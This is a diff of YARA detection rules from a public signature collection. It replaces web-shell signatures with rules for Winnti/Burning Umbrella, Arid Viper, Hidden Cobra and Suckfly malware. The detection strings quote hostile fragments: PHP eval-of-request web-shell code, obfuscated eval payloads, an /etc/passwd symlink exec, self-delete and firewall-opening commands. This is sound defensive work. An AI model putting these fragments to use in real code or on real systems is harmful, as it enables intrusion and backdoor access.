 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7ea49d5c29f1242f81f2393b514798ff7caccb50d46c60bdfcf61db00043473b"
+		hash1 = "d8df60524deb6df4f9ddd802037a248f9fbdd532151bb00e647b233e845b1617"
+		hash2 = "c55cb6b42cfabf0edf1499d383817164d1b034895e597068e019c19d787ea313"
+		hash3 = "32144ba8370826e069e5f1b6745a3625d10f50a809f3f2a72c4c7644ed0cab03"
+		hash4 = "ae616003d85a12393783eaff9778aba20189e423c11c852e96c29efa6ecfce81"
+		hash5 = "95b6e427883f402db73234b84a84015ad7f3456801cb9bb19df4b11739ea646d"
+		hash6 = "1419ba36aae1daecc7a81a2dfb96631537365a5b34247533d59a70c1c9f58da2"
+		hash7 = "6a5a9b0ae10ce6a0d5e1f7d21d8ea87894d62d0cda00db005d8d0de17cae7743"
+		hash8 = "74e348068f8851fec1b3de54550fe09d07fb85b7481ca6b61404823b473885bb"
+		hash9 = "adb9c2fe930fae579ce87059b4b9e15c22b6498c42df01db9760f75d983b93b2"
+		hash0 = "23f28b5c4e94d0ad86341c0b9054f197c63389133fcd81dd5e0cf59f774ce54b"
 
 	strings:
-		$s1 = "<?php Error_Reporting(0); $s_pass = \"" ascii
-		$s2 = "$s_func=\"cr\".\"eat\".\"e_fun\".\"cti\".\"on" ascii
+		$s1 = "c:\\tmp\\tran.exe" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x3c0a and filesize < 300KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "11675b4db0e7df7b29b1c1ef6f88e2e1" or pe.imphash ( ) == "364e1f68e2d412db34715709c68ba467" or pe.exports ( "deKernel" ) or 1 of them )
 }
-rule SIGNATURE_BASE_Unknown_8Af033424F9590A15472A23Cc3236E68070B952E : FILE
+rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_19 : FILE
 {
 	meta:
-		description = "Detects a web shell"
+		description = "Detects malware sample from Burning Umbrella report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fcf467b6-f49a-52d0-a57f-9f3cf6d0b25b"
-		date = "2016-09-10"
-		modified = "2025-03-29"
-		reference = "https://github.com/bartblaze/PHP-backdoors"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9557-L9572"
+		id = "8ab55e80-5d28-5a5f-a1cc-725ba6720e4b"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L315-L332"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d7dc9a2a5e0800b5061cb2101d7cda023a6e637f1e7b14054fdb6a0b2cec6084"
+		logic_hash = "218c16d1b67e3e80dc7fdaf67a869e92b39744cb336e70761ac960da36c00372"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3382b5eaaa9ad651ab4793e807032650667f9d64356676a16ae3e9b02740ccf3"
+		hash1 = "05e2912f2a593ba16a5a094d319d96715cbecf025bf88bb0293caaf6beb8bc20"
+		hash2 = "e7bbdb275773f43c8e0610ad75cfe48739e0a2414c948de66ce042016eae0b2e"
 
 	strings:
-		$s1 = "$check = $_SERVER['DOCUMENT_ROOT']" fullword ascii
-		$s2 = "$fp=fopen(\"$check\",\"w+\");" fullword ascii
-		$s3 = "fwrite($fp,base64_decode('" ascii
+		$s1 = "Cryption.dll" fullword ascii
+		$s2 = "tran.exe" fullword ascii
+		$s3 = "Kernel.dll" fullword ascii
+		$s4 = "Now ready to get the file %s!" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x6324 and filesize < 6KB and ( all of ( $s* ) ) ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and 3 of them
 }
-rule SIGNATURE_BASE_Dkshell_4000Bd83451F0D8501A9Dfad60Dce39E55Ae167D : FILE
+
+rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_20 : FILE
 {
 	meta:
-		description = "Detects a web shell"
+		description = "Detects malware sample from Burning Umbrella report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "804f7229-1440-5a2e-91cd-a58a38b22aa9"
-		date = "2016-09-10"
-		modified = "2025-03-29"
-		reference = "https://github.com/bartblaze/PHP-backdoors"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9574-L9592"
+		id = "1a39a76a-31e2-5d6e-82cb-ea38d503b6a9"
+		date = "2018-05-04"
+		modified = "2023-01-06"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L334-L355"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "26d586e32d1b0b7800b4b61f592dadc3dd0583628e4cd3fa4e24e02067077da5"
+		logic_hash = "e2739a89451a4eba0bae345203dd4c0e26f715bb079830e36c772861fdd0f4de"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "51a16b09520a3e063adf10ff5192015729a5de1add8341a43da5326e626315bd"
+		hash1 = "5c12379cd7ab3cb03dac354d0e850769873d45bb486c266a893c0daa452aa03c"
+		hash2 = "172cd90fd9e31ba70e47f0cc76c07d53e512da4cbfd197772c179fe604b75369"
+		hash3 = "1ce88e98c8b37ea68466657485f2c01010a4d4a88587ba0ae814f37680a2e7a8"
 
 	strings:
-		$x1 = "DK Shell - Took the Best made it Better..!!" fullword ascii
-		$x2 = "preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A\\x69\\x6E\\x66\\x6C\\x61\\x74\\x65\\x28\\x62\\x61\\x73\\x65\\x36\\x" ascii
-		$x3 = "echo '<b>Sw Bilgi<br><br>'.php_uname().'<br></b>';" fullword ascii
-		$s1 = "echo '<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">';" fullword ascii
-		$s9 = "$x = $_GET[\"x\"];" fullword ascii
+		$s1 = "Wordpad.Document.1\\shell\\open\\command\\" wide
+		$s2 = "%s\\shell\\Open\\command" fullword wide
+		$s3 = "expanding computer" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x3f3c and filesize < 200KB and 1 of ( $x* ) ) or ( 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "bac338bfe2685483c201e15eae4352d5" or 2 of them )
 }
-rule SIGNATURE_BASE_Webshell_5786D7D9F4B0Df731D79Ed927Fb5A124195Fc901 : FILE
+rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_21 : FILE
 {
 	meta:
-		description = "Detects a web shell"
+		description = "Detects malware sample from Burning Umbrella report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7958e5fc-5ac5-58bc-8128-0a778e99a4e4"
-		date = "2016-09-10"
-		modified = "2025-03-29"
-		reference = "https://github.com/bartblaze/PHP-backdoors"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9594-L9608"
+		id = "2193e4b6-b71c-5031-8e43-fdd7177ad05c"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L357-L376"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "348ccdf997965fbea791d835f1dd4e2c16d37a17ff4195e585fa4226f18faad6"
+		logic_hash = "4fdb162575bd108bb35e5c8ed10f7cac7539a15349218222dbb82d8eae8ad4bb"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b1733cbb0eb3d440c4174cc67ca693ba92308ded5fc1069ed650c3c78b1da4bc"
+		hash1 = "4b7b9c2a9d5080ccc4e9934f2fd14b9d4e8f6f500889bf9750f1d672c8724438"
 
 	strings:
-		$s1 = "preg_replace(\"\\x2F\\x2E\\x2A\\x2F\\x65\",\"\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A\\x69\\x6E\\x66\\x6C\\x61\\x74\\x65\\x28\\x62\\x" ascii
-		$s2 = "input[type=text], input[type=password]{" fullword ascii
+		$s1 = "c:\\windows\\ime\\setup.exe" fullword ascii
+		$s2 = "ws.run \"later.bat /start\",0Cet " fullword ascii
+		$s3 = "del later.bat" fullword ascii
+		$s4 = "mycrs.xls" fullword ascii
+		$a1 = "-el -s2 \"-d%s\" \"-p%s\" \"-sp%s\"" fullword ascii
+		$a2 = "<set ws=wscript.createobject(\"wscript.shell\")" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x6c3c and filesize < 80KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and 2 of them
 }
-rule SIGNATURE_BASE_Webshell_E8Eaf8Da94012E866E51547Cd63Bb996379690Bf : FILE
+rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_22 : FILE
 {
 	meta:
-		description = "Detects a web shell"
+		description = "Detects malware sample from Burning Umbrella report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8fda9b9f-9a72-5123-91d7-0d0aec9e17bc"
-		date = "2016-09-10"
-		modified = "2025-03-29"
-		reference = "https://github.com/bartblaze/PHP-backdoors"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9610-L9625"
+		id = "90c6cda9-95a0-5de7-b1cd-110c238d993d"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L378-L395"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "044491f0b07ef606aa76e70a07d161565f9cecf73e8f9f8db63cacc1c475b056"
+		logic_hash = "af2d7917f54ca365465383484b6d19a941d4801898d162a6d3afa7b7c8491a0f"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "027544baa10259939780e97dc908bd43f0fb940510119fc4cce0883f3dd88275"
+		hash1 = "fa116cf9410f1613003ca423ad6ca92657a61b8e9eda1b05caf4f30ca650aee5"
 
 	strings:
-		$x1 = "@exec('./bypass/ln -s /etc/passwd 1.php');" fullword ascii
-		$x2 = "echo \"<iframe src=mysqldumper/index.php width=100% height=100% frameborder=0></iframe> \";" fullword ascii
-		$x3 = "@exec('tar -xvf mysqldumper.tar.gz');" fullword ascii
+		$s1 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\" ascii
+		$s3 = "Content-Disposition: form-data; name=\"txt\"; filename=\"" fullword ascii
+		$s4 = "Fail To Enum Service" fullword ascii
+		$s5 = "Host Power ON Time" fullword ascii
+		$s6 = "%d Hours %2d Minutes %2d Seconds " fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x213c and filesize < 100KB and 1 of ( $x* ) ) or ( 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and 4 of them
 }
-rule SIGNATURE_BASE_Unknown_0F06C5D1B32F4994C3B3Abf8Bb76D5468F105167 : FILE
+rule SIGNATURE_BASE_MAL_Airdviper_Sample_Apr18_1 : FILE
 {
 	meta:
-		description = "Detects a web shell"
+		description = "Detects Arid Viper malware sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "efd09da2-f232-5a21-99c8-dc2bf00baa73"
-		date = "2016-09-10"
-		modified = "2025-03-29"
-		reference = "https://github.com/bartblaze/PHP-backdoors"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9627-L9642"
+		id = "00f118d1-be1c-5f50-a50f-591f824a1a53"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L398-L422"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6f4bdf8aecd527335c29a8e964c7d8688c3e77419595d3fd10a6cf3704711816"
+		logic_hash = "cbe1f36320eb9640ffbb6495faf7e5a062c5929d022bb56cbf0ebee810ef4e94"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6362372850ac7455fa9461ed0483032a1886543f213a431f81a2ac76d383b47e"
+		hash1 = "9f453f1d5088bd17c60e812289b4bb0a734b7ad2ba5a536f5fd6d6ac3b8f3397"
 
 	strings:
-		$s1 = "$check = $_SERVER['DOCUMENT_ROOT'] . \"/libraries/lola.php\" ;" fullword ascii
-		$s2 = "$fp=fopen(\"$check\",\"w+\");" fullword ascii
-		$s3 = "fwrite($fp,base64_decode('" ascii
+		$x1 = "cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del \"%s\"" fullword ascii
+		$x2 = "daenerys=%s&" ascii
+		$x3 = "betriebssystem=%s&anwendung=%s&AV=%s" ascii
+		$s1 = "Taskkill /IM  %s /F &  %s" fullword ascii
+		$s2 = "/api/primewire/%s/requests/macKenzie/delete" fullword ascii
+		$s3 = "\\TaskWindows.exe" ascii
+		$s4 = "MicrosoftOneDrives.exe" fullword ascii
+		$s5 = "\\SeanSansom.txt" ascii
 
 	condition:
-		( uint16( 0 ) == 0x6324 and filesize < 2KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 6000KB and ( 1 of ( $x* ) or 4 of them )
 }
-rule SIGNATURE_BASE_Wsoshell_0Bbebaf46F87718Caba581163D4Beed56Ddf73A7 : FILE
+rule SIGNATURE_BASE_MAL_Winnti_Sample_May18_1 : FILE
 {
 	meta:
-		description = "Detects a web shell"
+		description = "Detects malware sample from Burning Umbrella report - Generic Winnti Rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "92165645-5392-588d-ba2a-5ef6b7499a5a"
-		date = "2016-09-10"
-		modified = "2025-03-29"
-		reference = "https://github.com/bartblaze/PHP-backdoors"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9644-L9658"
+		id = "c2f3339e-269f-5a51-8db6-06e54a707b3a"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L426-L440"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bf5090fb909fea690c8a2af3cca35136eda3b9773976189158c25fb8877cc266"
+		logic_hash = "e235396de278120cbc4700f239c41e7f21e97ba111c07022ae505de540dda2bc"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d053086907aed21fbb6019bf9e644d2bae61c63563c4c3b948d755db3e78f395"
+		hash1 = "528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41"
 
 	strings:
-		$s8 = "$default_charset='Wi'.'ndo.'.'ws-12'.'51';" fullword ascii
-		$s9 = "$mosimage_session = \"" fullword ascii
+		$s1 = "wireshark" fullword wide
+		$s2 = "procexp" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x3f3c and filesize < 300KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Generic_1609_A : FILE
+
+rule SIGNATURE_BASE_MAL_Visel_Sample_May18_1 : FILE
 {
 	meta:
-		description = "Auto-generated rule"
+		description = "Detects Visel malware sample from Burning Umbrella report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4b7db4db-8699-5b4d-ab90-ce79f1160984"
-		date = "2016-09-10"
-		modified = "2025-03-29"
-		reference = "https://github.com/bartblaze/PHP-backdoors"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9660-L9675"
+		id = "a244461a-380c-56e6-a891-131f6e13c280"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L442-L460"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e5a4bba3a7b1c712203fcc8b85e4089b0ff18a26e96f5a04529616dbfb9de651"
+		logic_hash = "3200e3224e037a116451b09ce265c1794a05406876376531ac81eb720fcb6945"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "c817a490cfd4d6377c15c9ac9bcfa136f4a45ff5b40c74f15216c030f657d035"
-		hash3 = "69b9d55ea2eb4a0d9cfe3b21b0c112c31ea197d1cb00493d1dddc78b90c5745e"
+		hash1 = "35db8e6a2eb5cf09cd98bf5d31f6356d0deaf4951b353fc513ce98918b91439c"
 
 	strings:
-		$s1 = "return $qwery45234dws($b);" fullword ascii
+		$s2 = "print32.dll" fullword ascii
+		$s3 = "c:\\a\\b.txt" fullword ascii
+		$s4 = "\\temp\\s%d.dat" wide
 
 	condition:
-		( uint16( 0 ) == 0x3f3c and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.exports ( "szFile" ) or 2 of them )
 }
-rule SIGNATURE_BASE_Nishang_Webshell : FILE
+rule SIGNATURE_BASE_APT_Hiddencobra_Enc_PK_Header : HIDDEN_COBRA TYPEFRAME FILE
 {
 	meta:
-		description = "Detects a ASPX web shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "785e6da7-097e-598b-9799-ffe43738d718"
-		date = "2016-09-11"
-		modified = "2025-03-29"
-		reference = "https://github.com/samratashok/nishang"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9677-L9692"
+		description = "Hidden Cobra - Detects trojan with encrypted header"
+		author = "NCCIC trusted 3rd party - Edit: Tobias Michalski"
+		id = "5d7001b3-162c-5a97-a740-1b8e33d4aa9e"
+		date = "2018-04-12"
+		modified = "2023-12-05"
+		reference = "https://www.us-cert.gov/ncas/analysis-reports/AR18-165A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ar18_165a.yar#L2-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b8a3c8e80a4e41e556e2d65df4126d84723ded6ca623302afc4cc328bded346c"
+		logic_hash = "d0c8345b69e5f421fd93bc239031f2e51a120ae64be1eca0c1fdae2aa55ac42a"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "HIDDEN_COBRA, TYPEFRAME, FILE"
+		incident = "10135536"
+		category = "hidden_cobra"
+		family = "TYPEFRAME"
+		hash0 = "3229a6cea658b1b3ca5ca9ad7b40d8d4"
 
 	strings:
-		$s1 = "psi.Arguments = \"-noninteractive \" + \"-executionpolicy bypass \" + arg;" ascii
-		$s2 = "output.Text += \"\nPS> \" + console.Text + \"\n\" + do_ps(console.Text);" ascii
-		$s3 = "<title>Antak Webshell</title>" fullword ascii
-		$s4 = "<asp:Button ID=\"executesql\" runat=\"server\" Text=\"Execute SQL Query\"" ascii
+		$s0 = { 5f a8 80 c5 a0 87 c7 f0 9e e6 }
+		$s1 = { 95 f1 6e 9c 3f c1 2c 88 a0 5a }
+		$s2 = { ae 1d af 74 c0 f5 e1 02 50 10 }
 
 	condition:
-		( uint16( 0 ) == 0x253C and filesize < 100KB and 1 of ( $s* ) )
+		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and any of them
 }
-rule SIGNATURE_BASE_PHP_Webshell_1_Feb17 : FILE
+rule SIGNATURE_BASE_APT_Hiddencobra_Import_Obfuscation_2 : HIDDEN_COBRA TYPEFRAME FILE
 {
 	meta:
-		description = "Detects a simple cloaked PHP web shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "eedf87c9-2dab-530d-b5d8-a4c2ebc87821"
-		date = "2017-02-28"
-		modified = "2025-03-29"
-		reference = "https://isc.sans.edu/diary/Analysis+of+a+Simple+PHP+Backdoor/22127"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9704-L9725"
+		description = "Hidden Cobra - Detects remote access trojan"
+		author = "NCCIC trusted 3rd party - Edit: Tobias Michalski"
+		id = "bc139580-a55b-514f-8a4e-ca1402ce3ad9"
+		date = "2018-04-12"
+		modified = "2023-12-05"
+		reference = "https://www.us-cert.gov/ncas/analysis-reports/AR18-165A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ar18_165a.yar#L21-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c8576b20ec3f81b3ef0aa5a508c94e07d591d68767cb4598ad10778b4305915d"
+		logic_hash = "d52fc053afc6b3beb35a6dfd0f9b3714a5bad4e9b0dcfcce7be87d65f0a0c23e"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "HIDDEN_COBRA, TYPEFRAME, FILE"
+		incident = "10135536"
+		category = "hidden_cobra"
+		family = "TYPEFRAME"
+		hash0 = "bfb41bc0c3856aa0a81a5256b7b8da51"
 
 	strings:
-		$h1 = "<?php ${\"\\x" ascii
-		$x1 = "\";global$auth;function sh_decrypt_phase($data,$key){${\"" ascii
-		$x2 = "global$auth;return sh_decrypt_phase(sh_decrypt_phase($" ascii
-		$x3 = "]}[\"\x64\"]);}}echo " ascii
-		$x4 = "\"=>@phpversion(),\"\\x" ascii
-		$s1 = "$i=Array(\"pv\"=>@phpversion(),\"sv\"" ascii
-		$s3 = "$data = @unserialize(sh_decrypt(@base64_decode($data),$data_key));" ascii
+		$s0 = {A6 D6 02 EB 4E B2 41 EB C3 EF 1F}
+		$s1 = {B6 DF 01 FD 48 B5 }
+		$s2 = {B6 D5 0E F3 4E B5 }
+		$s3 = {B7 DF 0E EE }
+		$s4 = {B6 DF 03 FC }
+		$s5 = {A7 D3 03 FC }
 
 	condition:
-		uint32( 0 ) == 0x68703f3c and ( $h1 at 0 and 1 of them ) or 2 of them
+		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and all of them
 }
-rule SIGNATURE_BASE_Webshell_Tiny_JSP_2 : FILE
+rule SIGNATURE_BASE_APT_NK_AR18_165A_Hiddencobra_Import_Deob : HIDDEN_COBRA TYPEFRAME FILE
 {
 	meta:
-		description = "Detects a tiny webshell - chine chopper"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b628c4f9-eb07-592d-834a-5c94e41987da"
-		date = "2015-12-05"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9727-L9739"
+		description = "Hidden Cobra - Detects installed proxy module as a service"
+		author = "NCCIC trusted 3rd party - Edit: Tobias Michalski"
+		id = "f403d589-be35-57a7-9675-f92657c11acc"
+		date = "2018-04-12"
+		modified = "2023-12-05"
+		reference = "https://www.us-cert.gov/ncas/analysis-reports/AR18-165A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ar18_165a.yar#L43-L60"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6fd514df9d53293a8cfd4b9c807f993558e39979592aa221f18cd76079c00fb7"
-		score = 100
+		hash = "ae769e62fef4a1709c12c9046301aa5d"
+		hash = "e48fe20eblf5a5887f2ac631fed9ed63"
+		logic_hash = "2eff83738ca4f2db8327c1ee2a9539d7ce882a315025a656d391c16079e432cb"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "HIDDEN_COBRA, TYPEFRAME, FILE"
+		incident = "10135536"
+		category = "hidden_cobra"
+		family = "TYPEFRAME"
 
 	strings:
-		$s1 = "<%eval(Request(" nocase
+		$ = { 8a 01 3c 62 7c 0a 3c 79 7f 06 b2 db 2a d0 88 11 8a 41 01 41 84 c0 75 e8}
+		$ = { 8A 08 80 F9 62 7C 0B 80 F9 79 7F 06 82 DB 2A D1 88 10 8A 48 01 40 84 C9 75 E6}
 
 	condition:
-		uint16( 0 ) == 0x253c and filesize < 40 and all of them
+		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and any of them
 }
-rule SIGNATURE_BASE_Wordpress_Config_Webshell_Preprend : FILE
+rule SIGNATURE_BASE_APT_NK_AR18_165A_1 : FILE
 {
 	meta:
-		description = "Webshell that uses standard Wordpress wp-config.php file and appends the malicious code in front of it"
+		description = "Detects APT malware from AR18-165A report by US CERT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2a432c53-5dee-5a2e-9ccf-9e5d52713af9"
-		date = "2017-06-25"
-		modified = "2025-03-29"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9751-L9773"
+		id = "45f5205d-7f69-5646-aef8-f95d139f9720"
+		date = "2018-06-15"
+		modified = "2023-12-05"
+		reference = "https://www.us-cert.gov/ncas/analysis-reports/AR18-165A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ar18_165a.yar#L62-L76"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "97d7b85fa191380fe8b26ea60c8735a8f7179acc3a496ff0fc0dc5eefde2fe8a"
-		score = 65
+		logic_hash = "7b87c537c9ff38329a5e1e39d5ad1d6cef724c580f246721443eab603534b29d"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "089e49de61701004a5eff6de65476ed9c7632b6020c2c0f38bb5761bca897359"
 
 	strings:
-		$x1 = " * @package WordPress" fullword ascii
-		$s1 = "define('DB_NAME'," ascii
-		$s2 = "require_once(ABSPATH . 'wp-settings.php');" ascii
-		$fp1 = "iThemes Security Config" ascii
+		$s1 = "netsh.exe advfirewall firewall add rule name=\"PortOpenning\" dir=in protocol=tcp localport=%d action=allow enable=yes" fullword wide
+		$s2 = "netsh.exe firewall add portopening TCP %d \"PortOpenning\" enable" fullword wide
 
 	condition:
-		uint32( 0 ) == 0x68703f3c and filesize < 400KB and $x1 and all of ( $s* ) and not $x1 in ( 0 .. 1000 ) and not 1 of ( $fp* )
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them
 }
-rule SIGNATURE_BASE_PAS_Webshell_Encoded : FILE
+rule SIGNATURE_BASE_Suckfly_Nidiran_Gen_1 : FILE
 {
 	meta:
-		description = "Detects a PAS webshell"
+		description = "Detects Suckfly Nidiran Trojan"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6cb547ad-7a97-5c3d-83e1-114ea798ddb8"
-		date = "2017-07-11"
-		modified = "2025-03-29"
-		reference = "http://blog.talosintelligence.com/2017/07/the-medoc-connection.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9784-L9819"
+		id = "1abc596a-5fb1-55f9-b72d-022bfc6d10c7"
+		date = "2018-01-28"
+		modified = "2023-12-05"
+		reference = "https://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_suckfly.yar#L14-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
